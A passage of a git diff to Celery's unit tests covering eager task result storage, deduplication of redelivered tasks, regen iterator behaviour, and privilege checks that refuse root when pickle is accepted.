+ False # store_result
+ )
+
+ def test_eager_task_does_not_call_store_result(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = BaseDictBackend(app=self.app)
+ backend.store_result = Mock()
+ add.backend = backend
+ add.ignore_result = False
+
+ self.trace(add, (2, 2), {}, eager=True)
+
+ add.backend.store_result.assert_not_called()
+
+ def test_eager_task_will_store_result_if_proper_setting_is_set(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ add.backend = Mock(name='backend')
+ add.store_eager_result = True
+ add.ignore_result = False
+
+ self.trace(add, (2, 2), {}, eager=True)
+
+ add.backend.mark_as_done.assert_called_once_with(
+ 'id-1', # task_id
+ 4, # result
+ ANY, # request
+ True # store_result
+ )
+
+ def test_eager_task_with_setting_will_call_store_result(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = BaseDictBackend(app=self.app)
+ backend.store_result = Mock()
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+
+ self.trace(add, (2, 2), {}, eager=True)
+
+ add.backend.store_result.assert_called_once_with(
+ 'id-1',
+ 4,
+ states.SUCCESS,
+ request=ANY
+ )
+
def test_when_backend_raises_exception(self):
@self.app.task(shared=False)
def add(x, y):
@@ -176,42 +258,33 @@ def raise_dummy():
except KeyError as exc:
traceback_clear(exc)
- if sys.version_info >= (3, 5, 0):
- tb_ = exc.__traceback__
- while tb_ is not None:
- if str(tb_.tb_frame.__repr__) == frame_list[0]:
- assert len(tb_.tb_frame.f_locals) == 0
- tb_ = tb_.tb_next
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear.assert_called()
+ tb_ = exc.__traceback__
+ while tb_ is not None:
+ if str(tb_.tb_frame.__repr__) == frame_list[0]:
+ assert len(tb_.tb_frame.f_locals) == 0
+ tb_ = tb_.tb_next
try:
raise_dummy()
except KeyError as exc:
traceback_clear()
- if sys.version_info >= (3, 5, 0):
- tb_ = exc.__traceback__
- while tb_ is not None:
- if str(tb_.tb_frame.__repr__) == frame_list[0]:
- assert len(tb_.tb_frame.f_locals) == 0
- tb_ = tb_.tb_next
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear.assert_called()
+ tb_ = exc.__traceback__
+ while tb_ is not None:
+ if str(tb_.tb_frame.__repr__) == frame_list[0]:
+ assert len(tb_.tb_frame.f_locals) == 0
+ tb_ = tb_.tb_next
try:
raise_dummy()
except KeyError as exc:
traceback_clear(str(exc))
- if sys.version_info >= (3, 5, 0):
- tb_ = exc.__traceback__
- while tb_ is not None:
- if str(tb_.tb_frame.__repr__) == frame_list[0]:
- assert len(tb_.tb_frame.f_locals) == 0
- tb_ = tb_.tb_next
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear.assert_called()
+ tb_ = exc.__traceback__
+ while tb_ is not None:
+ if str(tb_.tb_frame.__repr__) == frame_list[0]:
+ assert len(tb_.tb_frame.f_locals) == 0
+ tb_ = tb_.tb_next
@patch('celery.app.trace.traceback_clear')
def test_when_Ignore(self, mock_traceback_clear):
@@ -345,7 +418,7 @@ def test_trace_exception(self, mock_traceback_clear):
mock_traceback_clear.assert_called()
def test_trace_task_ret__no_content_type(self):
- _trace_task_ret(
+ trace_task_ret(
self.add.name, 'id1', {}, ((2, 2), {}, {}), None, None, app=self.app,
)
@@ -353,7 +426,7 @@ def test_fast_trace_task__no_content_type(self):
self.app.tasks[self.add.name].__trace__ = build_tracer(
self.add.name, self.add, app=self.app,
)
- _fast_trace_task(
+ fast_trace_task(
self.add.name,
'id1',
{},
@@ -406,6 +479,95 @@ def xtask():
assert info is not None
assert isinstance(ret, ExceptionInfo)
+ def test_deduplicate_successful_tasks__deduplication(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = CacheBackend(app=self.app, backend='memory')
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+ add.acks_late = True
+
+ self.app.conf.worker_deduplicate_successful_tasks = True
+ task_id = str(uuid4())
+ request = {'id': task_id, 'delivery_info': {'redelivered': True}}
+
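+ # The first run executes normally; the redelivered duplicate is skipped
+ # and returns no result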
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (None, None)
+
+ self.app.conf.worker_deduplicate_successful_tasks = False
+
+ def test_deduplicate_successful_tasks__no_deduplication(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = CacheBackend(app=self.app, backend='memory')
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+ add.acks_late = True
+
+ self.app.conf.worker_deduplicate_successful_tasks = True
+ task_id = str(uuid4())
+ request = {'id': task_id, 'delivery_info': {'redelivered': True}}
+
+ with patch('celery.app.trace.AsyncResult') as async_result_mock:
+ async_result_mock().state.return_value = PENDING
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+
+ self.app.conf.worker_deduplicate_successful_tasks = False
+
+ def test_deduplicate_successful_tasks__result_not_found(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = CacheBackend(app=self.app, backend='memory')
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+ add.acks_late = True
+
+ self.app.conf.worker_deduplicate_successful_tasks = True
+ task_id = str(uuid4())
+ request = {'id': task_id, 'delivery_info': {'redelivered': True}}
+
+ with patch('celery.app.trace.AsyncResult') as async_result_mock:
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
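+ # Simulate the backend failing when the task state is looked up - the
+ # task should run again rather than be deduplicated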
+ state_property = PropertyMock(side_effect=BackendGetMetaError)
+ type(async_result_mock()).state = state_property
+ assert trace(self.app, add, (1, 1), task_id=task_id, request=request) == (2, None)
+
+ self.app.conf.worker_deduplicate_successful_tasks = False
+
+ def test_deduplicate_successful_tasks__cached_request(self):
+ @self.app.task(shared=False)
+ def add(x, y):
+ return x + y
+
+ backend = CacheBackend(app=self.app, backend='memory')
+ add.backend = backend
+ add.store_eager_result = True
+ add.ignore_result = False
+ add.acks_late = True
+
+ self.app.conf.worker_deduplicate_successful_tasks = True
+
+ task_id = str(uuid4())
+ request = {'id': task_id, 'delivery_info': {'redelivered': True}}
+
+ successful_requests.add(task_id)
+
+ assert trace(self.app, add, (1, 1), task_id=task_id,
+ request=request) == (None, None)
+
+ successful_requests.clear()
+ self.app.conf.worker_deduplicate_successful_tasks = False
+
class test_TraceInfo(TraceCase):
class TI(TraceInfo):
@@ -422,6 +584,32 @@ def test_handle_error_state(self):
call_errbacks=True,
)
+ def test_handle_error_state_for_eager_task(self):
+ x = self.TI(states.FAILURE)
+ x.handle_failure = Mock()
+
+ x.handle_error_state(self.add, self.add.request, eager=True)
+ x.handle_failure.assert_called_once_with(
+ self.add,
+ self.add.request,
+ store_errors=False,
+ call_errbacks=True,
+ )
+
+ def test_handle_error_for_eager_saved_to_backend(self):
+ x = self.TI(states.FAILURE)
+ x.handle_failure = Mock()
+
+ self.add.store_eager_result = True
+
+ x.handle_error_state(self.add, self.add.request, eager=True)
+ x.handle_failure.assert_called_with(
+ self.add,
+ self.add.request,
+ store_errors=True,
+ call_errbacks=True,
+ )
+
@patch('celery.app.trace.ExceptionInfo')
def test_handle_reject(self, ExceptionInfo):
x = self.TI(states.FAILURE)
@@ -444,4 +632,4 @@ def foo(self, i):
assert foo(1).called_directly
finally:
- reset_worker_optimizations()
+ reset_worker_optimizations(self.app)
diff --git a/t/unit/test_canvas.py b/t/unit/test_canvas.py
new file mode 100644
index 00000000000..4ba7ba59f3e
--- /dev/null
+++ b/t/unit/test_canvas.py
@@ -0,0 +1,33 @@
+import uuid
+
+
+class test_Canvas:
+
+ def test_freeze_reply_to(self):
+ # Tests that Canvas.freeze() correctly
+ # creates reply_to option
+
+ @self.app.task
+ def test_task(a, b):
+ return
+
+ s = test_task.s(2, 2)
+ s.freeze()
+
+ from concurrent.futures import ThreadPoolExecutor
+
+ def foo():
+ s = test_task.s(2, 2)
+ s.freeze()
+ return self.app.thread_oid, s.options['reply_to']
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(foo)
+ t_reply_to_app, t_reply_to_opt = future.result()
+
+ assert uuid.UUID(s.options['reply_to'])
+ assert uuid.UUID(t_reply_to_opt)
+ # reply_to must be equal to thread_oid of Application
+ assert self.app.thread_oid == s.options['reply_to']
+ assert t_reply_to_app == t_reply_to_opt
+ # reply_to must be thread-relative.
+ assert t_reply_to_opt != s.options['reply_to']
diff --git a/t/unit/utils/test_collections.py b/t/unit/utils/test_collections.py
index 1830c7ce7cd..be5f96d2ad2 100644
--- a/t/unit/utils/test_collections.py
+++ b/t/unit/utils/test_collections.py
@@ -1,5 +1,5 @@
import pickle
-from collections import Mapping
+from collections.abc import Mapping
from itertools import count
from time import monotonic
@@ -129,11 +129,11 @@ def test_len(self):
assert len(self.view) == 2
def test_isa_mapping(self):
- from collections import Mapping
+ from collections.abc import Mapping
assert issubclass(ConfigurationView, Mapping)
def test_isa_mutable_mapping(self):
- from collections import MutableMapping
+ from collections.abc import MutableMapping
assert issubclass(ConfigurationView, MutableMapping)
@@ -178,7 +178,7 @@ def test_add(self):
def test_purge(self):
# purge now enforces rules
- # cant purge(1) now. but .purge(now=...) still works
+ # can't purge(1) now, but .purge(now=...) still works
s = LimitedSet(maxlen=10)
[s.add(i) for i in range(10)]
s.maxlen = 2
diff --git a/t/unit/utils/test_dispatcher.py b/t/unit/utils/test_dispatcher.py
index b5e11c40bb8..b100b68b800 100644
--- a/t/unit/utils/test_dispatcher.py
+++ b/t/unit/utils/test_dispatcher.py
@@ -15,13 +15,13 @@ def garbage_collect():
elif hasattr(sys, 'pypy_version_info'):
- def garbage_collect(): # noqa
+ def garbage_collect():
# Collecting weakreferences can take two collections on PyPy.
gc.collect()
gc.collect()
else:
- def garbage_collect(): # noqa
+ def garbage_collect():
gc.collect()
diff --git a/t/unit/utils/test_functional.py b/t/unit/utils/test_functional.py
index 503b7476655..721fd414a3e 100644
--- a/t/unit/utils/test_functional.py
+++ b/t/unit/utils/test_functional.py
@@ -1,10 +1,13 @@
+import collections
+
import pytest
+import pytest_subtests # noqa: F401
from kombu.utils.functional import lazy
from celery.utils.functional import (DummyContext, first, firstmethod,
fun_accepts_kwargs, fun_takes_argument,
- head_from_fun, maybe_list, mlazy,
- padlist, regen, seq_concat_item,
+ head_from_fun, lookahead, maybe_list,
+ mlazy, padlist, regen, seq_concat_item,
seq_concat_seq)
@@ -66,6 +69,10 @@ def predicate(value):
assert iterations[0] == 10
+def test_lookahead():
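+ # lookahead() pairs each item with its successor, yielding None as the
+ # successor of the final item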
+ assert list(lookahead(x for x in range(6))) == [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)]
+
+
def test_maybe_list():
assert maybe_list(1) == [1]
assert maybe_list([1]) == [1]
@@ -94,8 +101,11 @@ def test_list(self):
fun, args = r.__reduce__()
assert fun(*args) == l
- def test_gen(self):
- g = regen(iter(list(range(10))))
+ @pytest.fixture
+ def g(self):
+ return regen(iter(list(range(10))))
+
+ def test_gen(self, g):
assert g[7] == 7
assert g[6] == 6
assert g[5] == 5
@@ -107,17 +117,19 @@ def test_gen(self):
assert g.data, list(range(10))
assert g[8] == 8
assert g[0] == 0
- g = regen(iter(list(range(10))))
+
+ def test_gen__index_2(self, g):
assert g[0] == 0
assert g[1] == 1
assert g.data == list(range(10))
- g = regen(iter([1]))
- assert g[0] == 1
+
+ def test_gen__index_error(self, g):
+ assert g[0] == 0
with pytest.raises(IndexError):
- g[1]
- assert g.data == [1]
+ g[11]
+ assert list(iter(g)) == list(range(10))
- g = regen(iter(list(range(10))))
+ def test_gen__negative_index(self, g):
assert g[-1] == 9
assert g[-2] == 8
assert g[-3] == 7
@@ -128,12 +140,146 @@ def test_gen(self):
assert list(iter(g)) == list(range(10))
+ def test_nonzero__does_not_consume_more_than_first_item(self):
+ def build_generator():
+ yield 1
+ pytest.fail("generator should not consume past first item")
+ yield 2
+
+ g = regen(build_generator())
+ assert bool(g)
+ assert g[0] == 1
+
+ def test_nonzero__empty_iter(self):
+ assert not regen(iter([]))
+
+ def test_deque(self):
+ original_list = [42]
+ d = collections.deque(original_list)
+ # Confirm that concretising a `regen()` instance repeatedly for an
+ # equality check always returns the original list
+ g = regen(d)
+ assert g == original_list
+ assert g == original_list
+
+ def test_repr(self):
+ def die():
+ raise AssertionError("Generator died")
+ yield None
+
+ # Confirm that `regen()` instances are not concretised when represented
+ g = regen(die())
+ assert "..." in repr(g)
+
+ def test_partial_reconcretisation(self):
+ class WeirdIterator():
+ def __init__(self, iter_):
+ self.iter_ = iter_
+ self._errored = False
+
+ def __iter__(self):
+ yield from self.iter_
+ if not self._errored:
+ try:
+ # This should stop the regen instance from marking
+ # itself as being done
+ raise AssertionError("Iterator errored")
+ finally:
+ self._errored = True
+
+ original_list = list(range(42))
+ g = regen(WeirdIterator(original_list))
+ iter_g = iter(g)
+ for e in original_list:
+ assert e == next(iter_g)
+ with pytest.raises(AssertionError, match="Iterator errored"):
+ next(iter_g)
+ # The following checks are for the known "misbehaviour"
+ assert getattr(g, "_regen__done") is False
+ # If the `regen()` instance doesn't think it's done then it'll duplicate
+ # the elements from the underlying iterator if it can be re-used
+ iter_g = iter(g)
+ for e in original_list * 2:
+ assert next(iter_g) == e
+ with pytest.raises(StopIteration):
+ next(iter_g)
+ assert getattr(g, "_regen__done") is True
+ # Finally we xfail this test to keep track of it
+ raise pytest.xfail(reason="#6794")
+
+ def test_length_hint_passthrough(self, g):
+ assert g.__length_hint__() == 10
+
+ def test_getitem_repeated(self, g):
+ halfway_idx = g.__length_hint__() // 2
+ assert g[halfway_idx] == halfway_idx
+ # These are now concretised so they should be returned without any work
+ assert g[halfway_idx] == halfway_idx
+ for i in range(halfway_idx + 1):
+ assert g[i] == i
+ # This should only need to concretise one more element
+ assert g[halfway_idx + 1] == halfway_idx + 1
+
+ def test_done_does_not_lag(self, g):
+ """
+ Check that `__done` is set as soon as the final item is yielded, even
+ though `__iter__()` never gets to run to completion.
+ """
+ # The range we zip with here should ensure that the `regen.__iter__`
+ # call never gets to return since we never attempt a failing `next()`
+ len_g = g.__length_hint__()
+ for i, __ in zip(range(len_g), g):
+ assert getattr(g, "_regen__done") is (i == len_g - 1)
+ # Just for sanity, check against a specific `bool` here
+ assert getattr(g, "_regen__done") is True
+
+ def test_lookahead_consume(self, subtests):
+ """
+ Confirm that regen looks ahead by a single item as expected.
+ """
+ def g():
+ yield from ["foo", "bar"]
+ raise pytest.fail("This should never be reached")
+
+ with subtests.test(msg="bool does not overconsume"):
+ assert bool(regen(g()))
+ with subtests.test(msg="getitem 0th does not overconsume"):
+ assert regen(g())[0] == "foo"
+ with subtests.test(msg="single iter does not overconsume"):
+ assert next(iter(regen(g()))) == "foo"
+
+ class ExpectedException(BaseException):
+ pass
+
+ def g2():
+ yield from ["foo", "bar"]
+ raise ExpectedException()
+
+ with subtests.test(msg="getitem 1th does overconsume"):
+ r = regen(g2())
+ with pytest.raises(ExpectedException):
+ r[1]
+ # Confirm that the item was concretised anyway
+ assert r[1] == "bar"
+ with subtests.test(msg="full iter does overconsume"):
+ r = regen(g2())
+ with pytest.raises(ExpectedException):
+ for _ in r:
+ pass
+ # Confirm that the items were concretised anyway
+ assert r == ["foo", "bar"]
+ with subtests.test(msg="data access does overconsume"):
+ r = regen(g2())
+ with pytest.raises(ExpectedException):
+ r.data
+ # Confirm that the items were concretised anyway
+ assert r == ["foo", "bar"]
+
class test_head_from_fun:
def test_from_cls(self):
class X:
- def __call__(x, y, kwarg=1): # noqa
+ def __call__(x, y, kwarg=1):
pass
g = head_from_fun(X())
@@ -203,6 +349,28 @@ def f(cls, x):
fun = head_from_fun(A.f, bound=True)
assert fun(1) == 1
+ def test_kwonly_required_args(self):
+ local = {}
+ fun = ('def f_kwargs_required(*, a="a", b, c=None):'
+ ' return')
+ exec(fun, {}, local)
+ f_kwargs_required = local['f_kwargs_required']
+ g = head_from_fun(f_kwargs_required)
+
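+ # `b` has no default, so every call below that omits it should raise
+ # TypeError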
+ with pytest.raises(TypeError):
+ g(1)
+
+ with pytest.raises(TypeError):
+ g(a=1)
+
+ with pytest.raises(TypeError):
+ g(c=1)
+
+ with pytest.raises(TypeError):
+ g(a=2, c=1)
+
+ g(b=3)
+
class test_fun_takes_argument:
@@ -238,7 +406,7 @@ def fun(a, b, foo):
])
def test_seq_concat_seq(a, b, expected):
res = seq_concat_seq(a, b)
- assert type(res) is type(expected) # noqa
+ assert type(res) is type(expected)
assert res == expected
@@ -248,7 +416,7 @@ def test_seq_concat_seq(a, b, expected):
])
def test_seq_concat_item(a, b, expected):
res = seq_concat_item(a, b)
- assert type(res) is type(expected) # noqa
+ assert type(res) is type(expected)
assert res == expected
diff --git a/t/unit/utils/test_local.py b/t/unit/utils/test_local.py
index a10accf086d..621a77595b2 100644
--- a/t/unit/utils/test_local.py
+++ b/t/unit/utils/test_local.py
@@ -1,4 +1,3 @@
-import sys
from unittest.mock import Mock
import pytest
@@ -143,8 +142,6 @@ def test_listproxy(self):
x[0:2] = [1, 2]
del(x[0:2])
assert str(x)
- if sys.version_info[0] < 3:
- assert x.__cmp__(object()) == -1
def test_complex_cast(self):
diff --git a/t/unit/utils/test_pickle.py b/t/unit/utils/test_pickle.py
index 936300a3945..a915e9446f6 100644
--- a/t/unit/utils/test_pickle.py
+++ b/t/unit/utils/test_pickle.py
@@ -9,7 +9,7 @@ class ArgOverrideException(Exception):
def __init__(self, message, status_code=10):
self.status_code = status_code
- Exception.__init__(self, message, status_code)
+ super().__init__(message, status_code)
class test_Pickle:
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index c58a3ed6d68..1c0a03d9893 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -1,30 +1,32 @@
import errno
import os
+import re
import signal
import sys
import tempfile
from unittest.mock import Mock, call, patch
import pytest
-from case import mock
import t.skip
from celery import _find_option_with_arg, platforms
-from celery.exceptions import SecurityError
-from celery.platforms import (DaemonContext, LockFailed, Pidfile,
- _setgroups_hack, check_privileges,
+from celery.exceptions import SecurityError, SecurityWarning
+from celery.platforms import (ASSUMING_ROOT, ROOT_DISALLOWED,
+ ROOT_DISCOURAGED, DaemonContext, LockFailed,
+ Pidfile, _setgroups_hack, check_privileges,
close_open_fds, create_pidlock, detached,
fd_by_path, get_fdmax, ignore_errno, initgroups,
isatty, maybe_drop_privileges, parse_gid,
- parse_uid, set_mp_process_title,
+ parse_uid, set_mp_process_title, set_pdeathsig,
set_process_title, setgid, setgroups, setuid,
signals)
from celery.utils.text import WhateverIO
+from t.unit import conftest
try:
import resource
except ImportError: # pragma: no cover
- resource = None # noqa
+ resource = None
def test_isatty():
@@ -158,6 +160,7 @@ def test_reset(self, set):
def test_setitem(self, set):
def handle(*args):
return args
+
signals['INT'] = handle
set.assert_called_with(signal.SIGINT, handle)
@@ -167,6 +170,18 @@ def test_setitem_raises(self, set):
signals['INT'] = lambda *a: a
+class test_set_pdeathsig:
+
+ def test_call(self):
+ set_pdeathsig('SIGKILL')
+
+ @t.skip.if_win32
+ def test_call_with_correct_parameter(self):
+ with patch('celery.platforms._set_pdeathsig') as _set_pdeathsig:
+ set_pdeathsig('SIGKILL')
+ _set_pdeathsig.assert_called_once_with(signal.SIGKILL)
+
+
@t.skip.if_win32
class test_get_fdmax:
@@ -218,6 +233,7 @@ class pw_struct:
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EPERM
+
setuid.side_effect = raise_on_second_call
getpwuid.return_value = pw_struct()
parse_uid.return_value = 5001
@@ -237,7 +253,9 @@ def to_root_on_second_call(mock, first):
def on_first_call(*args, **kwargs):
ret, return_value[0] = return_value[0], 0
return ret
+
mock.side_effect = on_first_call
+
to_root_on_second_call(geteuid, 10)
to_root_on_second_call(getuid, 10)
with pytest.raises(SecurityError):
@@ -259,6 +277,7 @@ def on_first_call(*args, **kwargs):
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.ENOENT
+
setuid.side_effect = raise_on_second_call
with pytest.raises(OSError):
maybe_drop_privileges(uid='user')
@@ -274,6 +293,7 @@ def test_with_guid(self, initgroups, setuid, setgid,
def raise_on_second_call(*args, **kwargs):
setuid.side_effect = OSError()
setuid.side_effect.errno = errno.EPERM
+
setuid.side_effect = raise_on_second_call
parse_uid.return_value = 5001
parse_gid.return_value = 50001
@@ -327,7 +347,6 @@ def test_parse_uid_when_int(self):
@patch('pwd.getpwnam')
def test_parse_uid_when_existing_name(self, getpwnam):
-
class pwent:
pw_uid = 5001
@@ -346,7 +365,6 @@ def test_parse_gid_when_int(self):
@patch('grp.getgrnam')
def test_parse_gid_when_existing_name(self, getgrnam):
-
class grent:
gr_gid = 50001
@@ -411,7 +429,7 @@ def test_without_resource(self):
@patch('celery.platforms.signals')
@patch('celery.platforms.maybe_drop_privileges')
@patch('os.geteuid')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_default(self, open, geteuid, maybe_drop,
signals, pidlock):
geteuid.return_value = 0
@@ -512,7 +530,7 @@ def test_create_pidlock(self, Pidfile):
p = Pidfile.return_value = Mock()
p.is_locked.return_value = True
p.remove_if_stale.return_value = False
- with mock.stdouts() as (_, err):
+ with conftest.stdouts() as (_, err):
with pytest.raises(SystemExit):
create_pidlock('/var/pid')
assert 'already exists' in err.getvalue()
@@ -549,14 +567,14 @@ def test_is_locked(self, exists):
assert not p.is_locked()
def test_read_pid(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('1816\n')
s.seek(0)
p = Pidfile('/var/pid')
assert p.read_pid() == 1816
def test_read_pid_partially_written(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('1816')
s.seek(0)
p = Pidfile('/var/pid')
@@ -566,20 +584,20 @@ def test_read_pid_partially_written(self):
def test_read_pid_raises_ENOENT(self):
exc = IOError()
exc.errno = errno.ENOENT
- with mock.open(side_effect=exc):
+ with conftest.open(side_effect=exc):
p = Pidfile('/var/pid')
assert p.read_pid() is None
def test_read_pid_raises_IOError(self):
exc = IOError()
exc.errno = errno.EAGAIN
- with mock.open(side_effect=exc):
+ with conftest.open(side_effect=exc):
p = Pidfile('/var/pid')
with pytest.raises(IOError):
p.read_pid()
def test_read_pid_bogus_pidfile(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('eighteensixteen\n')
s.seek(0)
p = Pidfile('/var/pid')
@@ -637,7 +655,7 @@ def test_remove_if_stale_process_alive(self, kill):
@patch('os.kill')
def test_remove_if_stale_process_dead(self, kill):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1816
@@ -650,7 +668,7 @@ def test_remove_if_stale_process_dead(self, kill):
p.remove.assert_called_with()
def test_remove_if_stale_broken_pid(self):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.side_effect = ValueError()
@@ -661,7 +679,7 @@ def test_remove_if_stale_broken_pid(self):
@patch('os.kill')
def test_remove_if_stale_unprivileged_user(self, kill):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1817
@@ -686,7 +704,7 @@ def test_remove_if_stale_no_pidfile(self):
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
getpid.return_value = 1816
osopen.return_value = 13
@@ -713,7 +731,7 @@ def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_write_reread_fails(self, open_, fdopen,
osopen, getpid, fsync):
getpid.return_value = 1816
@@ -739,6 +757,7 @@ def on_setgroups(groups):
setgroups.return_value = True
return
raise ValueError()
+
setgroups.side_effect = on_setgroups
_setgroups_hack(list(range(400)))
@@ -756,6 +775,7 @@ def on_setgroups(groups):
setgroups.return_value = True
return
raise exc
+
setgroups.side_effect = on_setgroups
_setgroups_hack(list(range(400)))
@@ -817,17 +837,218 @@ def test_setgroups_raises_EPERM(self, hack, getgroups):
getgroups.assert_called_with()
-def test_check_privileges():
- class Obj:
- fchown = 13
- prev, platforms.os = platforms.os, Obj()
- try:
- with pytest.raises(SecurityError):
- check_privileges({'pickle'})
- finally:
- platforms.os = prev
- prev, platforms.os = platforms.os, object()
- try:
+fails_on_win32 = pytest.mark.xfail(
+ sys.platform == "win32",
+ reason="fails on py38+ windows",
+)
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'},
+])
+@patch('celery.platforms.os')
+def test_check_privileges_suspicious_platform(os_module, accept_content):
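+ # Deleting the uid/gid accessors from the mocked os module simulates a
+ # platform where privileges cannot be inspected at all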
+ del os_module.getuid
+ del os_module.getgid
+ del os_module.geteuid
+ del os_module.getegid
+
+ with pytest.raises(SecurityError,
+ match=r'suspicious platform, contact support'):
+ check_privileges(accept_content)
+
+
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+def test_check_privileges(accept_content, recwarn):
+ check_privileges(accept_content)
+
+ assert len(recwarn) == 0
+
+
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+def test_check_privileges_no_fchown(os_module, accept_content, recwarn):
+ del os_module.fchown
+ check_privileges(accept_content)
+
+ assert len(recwarn) == 0
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+def test_check_privileges_without_c_force_root(os_module, accept_content):
+ os_module.environ = {}
+ os_module.getuid.return_value = 0
+ os_module.getgid.return_value = 0
+ os_module.geteuid.return_value = 0
+ os_module.getegid.return_value = 0
+
+ expected_message = re.escape(ROOT_DISALLOWED.format(uid=0, euid=0,
+ gid=0, egid=0))
+ with pytest.raises(SecurityError,
+ match=expected_message):
+ check_privileges(accept_content)
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+def test_check_privileges_with_c_force_root(os_module, accept_content):
+ os_module.environ = {'C_FORCE_ROOT': 'true'}
+ os_module.getuid.return_value = 0
+ os_module.getgid.return_value = 0
+ os_module.geteuid.return_value = 0
+ os_module.getegid.return_value = 0
+
+ with pytest.warns(SecurityWarning):
+ check_privileges(accept_content)
+
+
+@fails_on_win32
+@pytest.mark.parametrize(('accept_content', 'group_name'), [
+ ({'pickle'}, 'sudo'),
+ ({'application/group-python-serialize'}, 'sudo'),
+ ({'pickle', 'application/group-python-serialize'}, 'sudo'),
+ ({'pickle'}, 'wheel'),
+ ({'application/group-python-serialize'}, 'wheel'),
+ ({'pickle', 'application/group-python-serialize'}, 'wheel'),
+])
+@patch('celery.platforms.os')
+@patch('celery.platforms.grp')
+def test_check_privileges_with_c_force_root_and_with_suspicious_group(
+ grp_module, os_module, accept_content, group_name
+):
+ os_module.environ = {'C_FORCE_ROOT': 'true'}
+ os_module.getuid.return_value = 60
+ os_module.getgid.return_value = 60
+ os_module.geteuid.return_value = 60
+ os_module.getegid.return_value = 60
+
+ grp_module.getgrgid.return_value = [group_name]
+ grp_module.getgrgid.return_value = [group_name]
+
+ expected_message = re.escape(ROOT_DISCOURAGED.format(uid=60, euid=60,
+ gid=60, egid=60))
+ with pytest.warns(SecurityWarning, match=expected_message):
+ check_privileges(accept_content)
+
+
+@fails_on_win32
+@pytest.mark.parametrize(('accept_content', 'group_name'), [
+ ({'pickle'}, 'sudo'),
+ ({'application/group-python-serialize'}, 'sudo'),
+ ({'pickle', 'application/group-python-serialize'}, 'sudo'),
+ ({'pickle'}, 'wheel'),
+ ({'application/group-python-serialize'}, 'wheel'),
+ ({'pickle', 'application/group-python-serialize'}, 'wheel'),
+])
+@patch('celery.platforms.os')
+@patch('celery.platforms.grp')
+def test_check_privileges_without_c_force_root_and_with_suspicious_group(
+ grp_module, os_module, accept_content, group_name
+):
+ os_module.environ = {}
+ os_module.getuid.return_value = 60
+ os_module.getgid.return_value = 60
+ os_module.geteuid.return_value = 60
+ os_module.getegid.return_value = 60
+
+ grp_module.getgrgid.return_value = [group_name]
+ grp_module.getgrgid.return_value = [group_name]
+
+ expected_message = re.escape(ROOT_DISALLOWED.format(uid=60, euid=60,
+ gid=60, egid=60))
+ with pytest.raises(SecurityError,
+ match=expected_message):
+ check_privileges(accept_content)
+
+
+@fails_on_win32
+@pytest.mark.parametrize('accept_content', [
+ {'pickle'},
+ {'application/group-python-serialize'},
+ {'pickle', 'application/group-python-serialize'}
+])
+@patch('celery.platforms.os')
+@patch('celery.platforms.grp')
+def test_check_privileges_with_c_force_root_and_no_group_entry(
+ grp_module, os_module, accept_content, recwarn
+):
+ os_module.environ = {'C_FORCE_ROOT': 'true'}
+ os_module.getuid.return_value = 60
+ os_module.getgid.return_value = 60
+ os_module.geteuid.return_value = 60
